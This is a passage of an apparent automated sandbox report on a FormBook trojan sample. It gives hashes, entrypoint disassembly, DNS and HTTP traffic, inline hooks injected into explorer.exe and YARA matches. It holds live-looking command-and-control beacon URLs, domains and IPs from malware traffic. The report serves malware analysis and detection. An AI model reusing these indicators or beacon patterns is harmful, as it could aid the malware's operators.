http://www.alacatimacunu.com/dr62/	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.engagementbuzz.com	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.beginagainmen.com/dr62/www.ctjhxv3.vip	explorer.exe, 00000001.00000002.517521328.0000000007D2B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
34.102.136.180	ecoskiusa.com	United States		15169	GOOGLEUS	false
199.59.243.223	www.rodeosonline.uk	United States		395082	BODIS-NJUS	true

General Information

Joe Sandbox Version:	37.0.0 Beryl
Analysis ID:	830328
Start date and time:	2023-03-20 09:10:51 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 54s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	S22Ls0H4Sz.exe
Original Sample Name:	24552144f5fb02e6e73e46581a16dfd23eaffa02b90781f34f0b3692cab926d4.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@6/1@3/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 63.4% (good quality ratio 57.1%) Quality average: 70.6% Quality standard deviation: 32.4%
HCA Information:	Successful, ratio: 100% Number of executed functions: 69 Number of non-executed functions: 158
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 209.197.3.8
Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, wu-bg-shim.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:12:00	API Interceptor	904x Sleep call for process: explorer.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
199.59.243.223	Inquiry.exe	Get hash	malicious	FormBook	Browse	www.piergitarshoes.com/rs5b/?C4hBTriK=zhbsihX/pGFJaZpy6dND3H78PJ7JxpKHxXOuen1DNaNorGCumHf7SvafvJLlAK1tbLNpDx0WdS8kjnRSnmRz+iKN+lhheglTPbNOdD/WHfGC&-vA=9zxfH-hql
	http://survey-smiles.com	Get hash	malicious	Unknown	Browse	survey-smiles.com/_tr
	Inquiry.exe	Get hash	malicious	FormBook	Browse	www.piergitarshoes.com/rs5b/?0N=zhbsihX/pGFJaZpy6dND3H78PJ7JxpKHxXOuen1DNaNorGCumHf7SvafvJLlAK1tbLNpDx0WdS8kjnRSnmRyqROM+lRpYlc3Lw==&SEl_lU=Vy7s_z2oR
	Replacement_Mar_23.exe	Get hash	malicious	FormBook	Browse	www.hepatitistudies.com/gefg/?8y=z9CDf1wRJMtl0xHAydg9+PNNJAr6Rn7/JliGKU1TuYcu9kaLh4brwxOdL8RPWuw6xSwb9rbnLBvt6M24PCyiRZMzDSQdplunLQ==&JE=rTuWcEETH
	TNT_Invoice_pdf.exe	Get hash	malicious	FormBook	Browse	www.brandbenefitplaybook.com/tktq/?9y-=r34EYQJFuGkcjppPzxelmFD/tjHGky4AKlzBVV8hoUPn0faFjCaKqjQqzp8oSMxHM/6WZvEVbGylnQHfxxyFgSv4w7QGvrh6Og==&E6=iPjDN2g2Guken
	rCL-PLCOPY.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.baha-users-support.com/f6nc/?AioI=wOcZv5I3tldJZ80Ncm3pmPkn3bs9FlebK4CRSIG6PpNzQBcEhy3xQTnk7OhDXdOf20ssMGbtxq4fv3+R6DcFKNY8BXOsxgBqEg==&Ss38=ldkZ
	hI7ey7jFag.exe	Get hash	malicious	FormBook	Browse	www.192exchange.com/sz08/?Nv=fjU66Q3+YYEjchGu5UQ9EnF2ZrjWWzbP/7VSQOZRPSDWN06594j6W3iJuyHgzqJOWK7MCh6ldkbGiXyEkRHlseOKpWjY4YqEBQ==&SR=uAyJuWYMLR
	YP_INVOICE_999785.xlsx	Get hash	malicious	FormBook	Browse	www.192exchange.com/sz08/?bjHKBj=fjU66Q3+YYEjchGu7kQ0EnV2dvnSTTbP/7VSQOZRPSDWN06594j6HWiVuj3jyutOW666KBykZlX8pTumlxys4NmTjxuuuYWXel5KIk0=&0G1OJJ=eUTeCfLVHqm
	PO-230803-S00.exe	Get hash	malicious	FormBook	Browse	www.strengthenyourcoastal.com/gpc9/?pfD=+HY1+uMD3AwbSTzOf8hlNy+YFI5EhCvplExzCHxyP8dYc2ioa5bVuCjxBZe+ziiXJRGp0v1NpV2PPC+kr0vnpoUfR2LF2AVcQmVFd3+rLaBa&28=XrcXTyOAOYd9aU4
	HSBC Payment Advice_pdf.exe	Get hash	malicious	FormBook	Browse	www.brandbenefitplaybook.com/tktq/?-LCI9BF=r34EYQJFuGkcjppP1AiqgFv9mD7mj2sAKlzBVV8hoUPn0faFjCaKqjcqzp8oSMxHM/6WZvEVbGylnQHfxxyGgQz7x4o1vrkaNg==&1NNzm_=KGJ6rQZ

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
BODIS-NJUS	Inquiry.exe	Get hash	malicious	FormBook	Browse	199.59.243.223
	http://survey-smiles.com	Get hash	malicious	Unknown	Browse	199.59.243.223
	Inquiry.exe	Get hash	malicious	FormBook	Browse	199.59.243.223
	Replacement_Mar_23.exe	Get hash	malicious	FormBook	Browse	199.59.243.223
	TNT_Invoice_pdf.exe	Get hash	malicious	FormBook	Browse	199.59.243.223
	rCL-PLCOPY.exe	Get hash	malicious	FormBook, GuLoader	Browse	199.59.243.223
	hI7ey7jFag.exe	Get hash	malicious	FormBook	Browse	199.59.243.223
	YP_INVOICE_999785.xlsx	Get hash	malicious	FormBook	Browse	199.59.243.223
	PO-230803-S00.exe	Get hash	malicious	FormBook	Browse	199.59.243.223
	HSBC Payment Advice_pdf.exe	Get hash	malicious	FormBook	Browse	199.59.243.223
	rPO.UPPLRQ22301-005.exe	Get hash	malicious	FormBook	Browse	199.59.243.222
	TRANSFI1990869320230401.vbs	Get hash	malicious	FormBook	Browse	199.59.243.222
	DHL.exe	Get hash	malicious	FormBook	Browse	199.59.243.222
	DHL.exe	Get hash	malicious	FormBook	Browse	199.59.243.222
	amostra.bin.exe	Get hash	malicious	BLACKMatter	Browse	199.59.243.222
	h42aUGJl0v.exe	Get hash	malicious	FormBook	Browse	199.59.243.222
	AS12023000024196.exe	Get hash	malicious	FormBook, GuLoader	Browse	199.59.243.222
	Proof_Of_Payment_&_Proforma_Invoice.exe	Get hash	malicious	FormBook	Browse	199.59.243.222
	Aviso pagamento_08.03.2023.025104938.vbs	Get hash	malicious	FormBook	Browse	199.59.243.222
	UmB7W3DjYt.exe	Get hash	malicious	FormBook	Browse	199.59.243.222

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

Download File

Process:	C:\Windows\explorer.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	984
Entropy (8bit):	5.235042767122359
Encrypted:	false
SSDEEP:	24:Yq6CUXyhmbm1bNdB6hmAm1z0Jahmt3m1HZ6T06MhmCm1bxdB6hmLn7m17KTdB6hj:YqDUXycS1bNdUc91z0JacY1HZ6T06McU
MD5:	33999D756DF6A0AD612142EC85171F4A
SHA1:	4BEAF92A4F9CC7EF65016CCE6947DC39BEED0CFA
SHA-256:	502DD040F98661D899DEDECE8A31871ECF7DDB4D4A76F7912B7BA42E8CF5CFA6
SHA-512:	695D7EA65E71CECC1CB0B3D4B2587DC9DD7A5B5266C8F2DF689CBDF31537FB0D4E2628E9BEDE1C0E9622C8F48F38CF14585AD2C22BD0D873E253B93ACC812DAB
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	{"RecentItems":[{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":2852487056,"LastSwitchedHighPart":30747939,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":2842487056,"LastSwitchedHighPart":30747939,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":2832487056,"LastSwitchedHighPart":30747939,"PrePopulated":true},{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":2822487056,"LastSwitchedHighPart":30747939,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":2812487056,"LastSwitchedHighPart":30747939,"PrePopulated":true},{"AppID":"Microsoft.Getstarted_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":2802487056,"LastSwitchedHighPart":30747939,"PrePopulated":true}]}

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.394457122288939
TrID:	Win32 Executable (generic) a (10002005/4) 99.98% DOS Executable Generic (2002/1) 0.02%
File name:	S22Ls0H4Sz.exe
File size:	185856
MD5:	883a36165d45cffa69e01d06532d3958
SHA1:	4034cc0bc72a474fca5204528c658e6f79e0de4b
SHA256:	24552144f5fb02e6e73e46581a16dfd23eaffa02b90781f34f0b3692cab926d4
SHA512:	d136a91a0bf4e4ab8bf1152e33fbac22e4ee19bae6de8f11fd7488534cba42ccf2ac7b0e98a648e7712122dbf6ff3f471649e8b35572af7fc94131c7b35ea21e
SSDEEP:	3072:SOd+EHnpnQrnYS3sxfFHLhZlJ6AoRh3kd/+fkuedOd7RoLG3yHY:ZPJFEsVF/L6AoRhA/gpoLZ
TLSH:	C204AF32E601C071F2B252B5F67D0B7B4C3E0D347255A4AAA3E116E06EF59A5F12A31F
File Content Preview:	MZER.....X.......<......(...............................................!..L.!This program cannot be run in DOS mode....$.............f...f...f.......f.......f.......f.Rich..f.................PE..L......L............................ .............b........

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General

Entrypoint:	0x63f120
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x620000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x4CB50DEB [Wed Oct 13 01:39:55 2010 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 64h
call 00007FCBBCB81EEAh
mov esp, ebp
pop ebp
ret
call 00007FCBBCB856B5h
pop eax
ret
call 00007FCBBCB856B5h
pop eax
ret
call 00007FCBBCB81F33h
ret
call 00007FCBBCB856B5h
pop eax
ret
jmp 00007FCBBCB81F96h
ret
call 00007FCBBCB856B5h
pop eax
ret
push 88888888h
jmp 00007FCBBCB83904h
ret
call 00007FCBBCB856B5h
pop eax
ret
push 88888888h
jmp 00007FCBBCB83907h
ret
call 00007FCBBCB856B5h
pop eax
ret
push 88888888h
jmp 00007FCBBCB8390Ah
ret
call 00007FCBBCB856B5h
pop eax
ret
push 88888888h
jmp 00007FCBBCB8390Dh
ret
call 00007FCBBCB856B5h
pop eax
ret
push 88888888h
jmp 00007FCBBCB83910h
ret
call 00007FCBBCB856B5h
pop eax
ret
push 88888888h
jmp 00007FCBBCB83913h
ret
call 00007FCBBCB856B5h
pop eax
ret
push 88888888h
jmp 00007FCBBCB83916h
ret
call 00007FCBBCB856B5h
pop eax
ret
push 88888888h
jmp 00007FCBBCB83919h
ret
call 00007FCBBCB856B5h
pop eax
ret

Rich Headers

Programming Language:

[C++] VS2010 SP1 build 40219
[ASM] VS2010 SP1 build 40219
[LNK] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2d184	0x2d200	False	0.7624653739612188	data	7.410112834615964	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 20, 2023 09:12:51.678579092 CET	49700	80	192.168.2.7	199.59.243.223
Mar 20, 2023 09:12:51.698122025 CET	80	49700	199.59.243.223	192.168.2.7
Mar 20, 2023 09:12:51.698358059 CET	49700	80	192.168.2.7	199.59.243.223
Mar 20, 2023 09:12:51.698447943 CET	49700	80	192.168.2.7	199.59.243.223
Mar 20, 2023 09:12:51.718014956 CET	80	49700	199.59.243.223	192.168.2.7
Mar 20, 2023 09:12:51.901387930 CET	80	49700	199.59.243.223	192.168.2.7
Mar 20, 2023 09:12:51.901467085 CET	80	49700	199.59.243.223	192.168.2.7
Mar 20, 2023 09:12:51.901510000 CET	80	49700	199.59.243.223	192.168.2.7
Mar 20, 2023 09:12:51.901633024 CET	49700	80	192.168.2.7	199.59.243.223
Mar 20, 2023 09:12:51.901700974 CET	49700	80	192.168.2.7	199.59.243.223
Mar 20, 2023 09:12:51.901701927 CET	49700	80	192.168.2.7	199.59.243.223
Mar 20, 2023 09:12:51.915667057 CET	80	49700	199.59.243.223	192.168.2.7
Mar 20, 2023 09:12:51.915813923 CET	49700	80	192.168.2.7	199.59.243.223
Mar 20, 2023 09:12:51.921175957 CET	80	49700	199.59.243.223	192.168.2.7
Mar 20, 2023 09:13:12.423504114 CET	49701	80	192.168.2.7	34.102.136.180
Mar 20, 2023 09:13:12.441121101 CET	80	49701	34.102.136.180	192.168.2.7
Mar 20, 2023 09:13:12.441436052 CET	49701	80	192.168.2.7	34.102.136.180
Mar 20, 2023 09:13:12.441692114 CET	49701	80	192.168.2.7	34.102.136.180
Mar 20, 2023 09:13:12.459037066 CET	80	49701	34.102.136.180	192.168.2.7
Mar 20, 2023 09:13:12.558031082 CET	80	49701	34.102.136.180	192.168.2.7
Mar 20, 2023 09:13:12.558058977 CET	80	49701	34.102.136.180	192.168.2.7
Mar 20, 2023 09:13:12.558273077 CET	49701	80	192.168.2.7	34.102.136.180
Mar 20, 2023 09:13:12.558415890 CET	49701	80	192.168.2.7	34.102.136.180
Mar 20, 2023 09:13:12.575890064 CET	80	49701	34.102.136.180	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 20, 2023 09:12:51.637725115 CET	59477	53	192.168.2.7	8.8.8.8
Mar 20, 2023 09:12:51.671792030 CET	53	59477	8.8.8.8	192.168.2.7
Mar 20, 2023 09:13:12.398318052 CET	55752	53	192.168.2.7	8.8.8.8
Mar 20, 2023 09:13:12.421821117 CET	53	55752	8.8.8.8	192.168.2.7
Mar 20, 2023 09:13:33.368184090 CET	50330	53	192.168.2.7	8.8.8.8
Mar 20, 2023 09:13:33.575577021 CET	53	50330	8.8.8.8	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 20, 2023 09:12:51.637725115 CET	192.168.2.7	8.8.8.8	0x3014	Standard query (0)	www.rodeosonline.uk	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:13:12.398318052 CET	192.168.2.7	8.8.8.8	0x83b0	Standard query (0)	www.ecoskiusa.com	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:13:33.368184090 CET	192.168.2.7	8.8.8.8	0xc56f	Standard query (0)	www.lipcarehub.africa	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 20, 2023 09:12:51.671792030 CET	8.8.8.8	192.168.2.7	0x3014	No error (0)	www.rodeosonline.uk		199.59.243.223	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:13:12.421821117 CET	8.8.8.8	192.168.2.7	0x83b0	No error (0)	www.ecoskiusa.com	ecoskiusa.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 20, 2023 09:13:12.421821117 CET	8.8.8.8	192.168.2.7	0x83b0	No error (0)	ecoskiusa.com		34.102.136.180	A (IP address)	IN (0x0001)	false
Mar 20, 2023 09:13:33.575577021 CET	8.8.8.8	192.168.2.7	0xc56f	Server failure (2)	www.lipcarehub.africa	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.rodeosonline.uk

www.ecoskiusa.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.7	49700	199.59.243.223	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 20, 2023 09:12:51.698447943 CET	111	OUT	GET /dr62/?8puHhBQ=B3AsJdO88NrgtU445P0Qj8HC++GHyC4yWybf6kHDuQcW/4YExfWyQzJk6gC5aIKrFNVGNibX8g==&i6APjV=qT6l4Jv HTTP/1.1 Host: www.rodeosonline.uk Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 20, 2023 09:12:51.901387930 CET	112	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 20 Mar 2023 08:12:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: parking_session=13a79251-6be6-7bea-9801-dc5bea024080; expires=Mon, 20-Mar-2023 08:27:51 GMT; Max-Age=900; path=/; HttpOnly X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_d5mqK6aUiHMmtQhnff3Fqd4rCdQvku2HF2ctvW7+UFQe0zbUXzTDajP0BfoJW9vdu8Uys5QHvYsjmlyP7Cnkjg== Cache-Control: no-cache Accept-CH: sec-ch-prefers-color-scheme Critical-CH: sec-ch-prefers-color-scheme Vary: sec-ch-prefers-color-scheme Expires: Thu, 01 Jan 1970 00:00:01 GMT Cache-Control: no-store, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Data Raw: 34 37 37 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 64 35 6d 71 4b 36 61 55 69 48 4d 6d 74 51 68 6e 66 66 33 46 71 64 34 72 43 64 51 76 6b 75 32 48 46 32 63 74 76 57 37 2b 55 46 51 65 30 7a 62 55 58 7a 54 44 61 6a 50 30 42 66 6f 4a 57 39 76 64 75 38 55 79 73 35 51 48 76 59 73 6a 6d 6c 79 50 37 43 6e 6b 6a 67 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 Data Ascii: 477<!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_d5mqK6aUiHMmtQhnff3Fqd4rCdQvku2HF2ctvW7+UFQe0zbUXzTDajP0BfoJW9vdu8Uys5QHvYsjmlyP7Cnkjg=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="preconnect" hre
Mar 20, 2023 09:12:51.901467085 CET	113	IN	Data Raw: 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 27 6f 70 61 63 69 74 Data Ascii: f="https://www.google.com" crossorigin></head><body><div id="target" style='opacity: 0'></div><script>window.park = "eyJ1dWlkIjoiMTNhNzkyNTEtNmJlNi03YmVhLTk4MDEtZGM1YmVhMDI0MDgwIiwicGFnZV90aW1lIjoxNjc5Mjk5OTcxLCJwYWdlX3VybCI6Imh0dHA6XC9cL3d3dy

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.7	49701	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 20, 2023 09:13:12.441692114 CET	114	OUT	GET /dr62/?8puHhBQ=VZq4zfyp13DysCUQIEaDi+qr0DM7rOJNp6jn4qBcW2Y5aFC4KzyQAlIVaF2k53XLC8aM4WwDig==&i6APjV=qT6l4Jv HTTP/1.1 Host: www.ecoskiusa.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 20, 2023 09:13:12.558031082 CET	114	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Mon, 20 Mar 2023 08:13:12 GMT Content-Type: text/html Content-Length: 291 ETag: "6418120d-123" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x82 0x2E 0xE1
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x8A 0xAE 0xE1
GetMessageW	INLINE	0x48 0x8B 0xB8 0x8A 0xAE 0xE1
GetMessageA	INLINE	0x48 0x8B 0xB8 0x82 0x2E 0xE1

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: S22Ls0H4Sz.exePID: 5492, Parent PID: 3320

General

Target ID:	0
Start time:	09:11:47
Start date:	20/03/2023
Path:	C:\Users\user\Desktop\S22Ls0H4Sz.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\S22Ls0H4Sz.exe
Imagebase:	0x380000
File size:	185856 bytes
MD5 hash:	883A36165D45CFFA69E01D06532D3958
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000000.243255948.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000000.243255948.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000000.243255948.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000000.243255948.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000000.243255948.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.283956267.00000000003B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.283956267.00000000003B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.283956267.00000000003B0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.283956267.00000000003B0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.283956267.00000000003B0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Author: JPCERT/CC Incident Response Group Rule: 